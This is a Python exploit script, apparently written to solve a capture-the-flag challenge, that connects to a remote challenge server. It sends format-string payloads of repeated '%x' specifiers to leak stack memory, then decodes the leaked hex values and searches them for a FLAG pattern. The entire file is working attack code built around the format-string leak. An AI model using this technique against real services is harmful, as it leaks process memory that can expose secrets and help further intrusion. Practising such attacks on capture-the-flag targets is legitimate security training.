exploit6.py

import socket
import re

# Search for FLAG pattern in decoded ASCII
def search_flag(decoded_output):
    match = re.search(r"FLAG\{.*?\}", decoded_output)
    return match.group(0) if match else None

# Function to decode hexadecimal to ASCII
def hex_to_ascii(hex_values):
    ascii_output = ""
    for hex_val in hex_values:
        try:
            # Convert hex to ASCII, ignoring invalid values
            ascii_output += bytes.fromhex(hex_val).decode("utf-8", errors="ignore")
        except ValueError:
            pass
    return ascii_output

host = "challenges.0x0539.net"
port = 7070

# Start payload testing
max_payload_length = 30  # Test larger payloads for completeness
flag_found = False

for length in range(10, max_payload_length + 1, 5):
    payload = "%x " * length
    print(f"\n[+] Testing Payload with {length} entries")

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((host, port))
        banner = s.recv(1024).decode()
        print("Banner:\n", banner)

        s.sendall(payload.encode() + b"\n")
        response = s.recv(4096).decode()
        print("\nRaw Response:\n", response)

        # Extract hexadecimal values from response
        hex_values = re.findall(r"[0-9a-fA-F]{8}", response)
        decoded_output = hex_to_ascii(hex_values)

        # Check for FLAG
        flag = search_flag(decoded_output)
        if flag:
            print(f"\n[!] FLAG FOUND: {flag}")
            flag_found = True
            break

if not flag_found:
    print("\n[!] No FLAG found. Expand payload range or verify response handling.")